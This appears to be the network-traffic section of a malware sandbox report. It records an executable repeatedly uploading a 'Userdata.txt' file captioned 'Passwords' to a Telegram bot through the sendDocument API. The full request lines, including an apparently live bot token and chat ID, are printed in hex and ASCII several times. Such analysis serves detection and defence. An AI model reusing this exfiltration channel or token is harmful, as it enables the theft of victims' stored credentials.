                                                                                                            2025-01-10 20:54:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 34 32 65 31 31 33 38 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34142e1138abContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:28 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:28 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:28 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44758,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542468,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.550044149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:30 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3433fc6c9df6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 33 66 63 36 63 39 64 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3433fc6c9df6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:30 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:30 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:30 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44759,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542470,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.550046149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:32 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3458c368198e
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 35 38 63 33 36 38 31 39 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3458c368198eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:32 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:32 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:32 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44760,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542472,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.550048149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:34 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3484fdb0dcfa
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 38 34 66 64 62 30 64 63 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3484fdb0dcfaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:34 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:34 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:34 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44761,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542474,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.550050149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:35 UTC272OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34afcee2471b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:54:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 61 66 63 65 65 32 34 37 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34afcee2471bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:36 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:36 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:36 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44762,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542476,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.550052149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:37 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34dbbdda11f8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 64 62 62 64 64 61 31 31 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34dbbdda11f8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:37 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:37 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:37 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44763,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542477,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.550054149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:39 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd35154a777d2a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:54:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 35 31 35 34 61 37 37 37 64 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd35154a777d2aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:54:39 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:54:39 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:54:39 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44764,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542479,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.550056149.154.167.2204432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:54:40 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd354d6985ff47
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
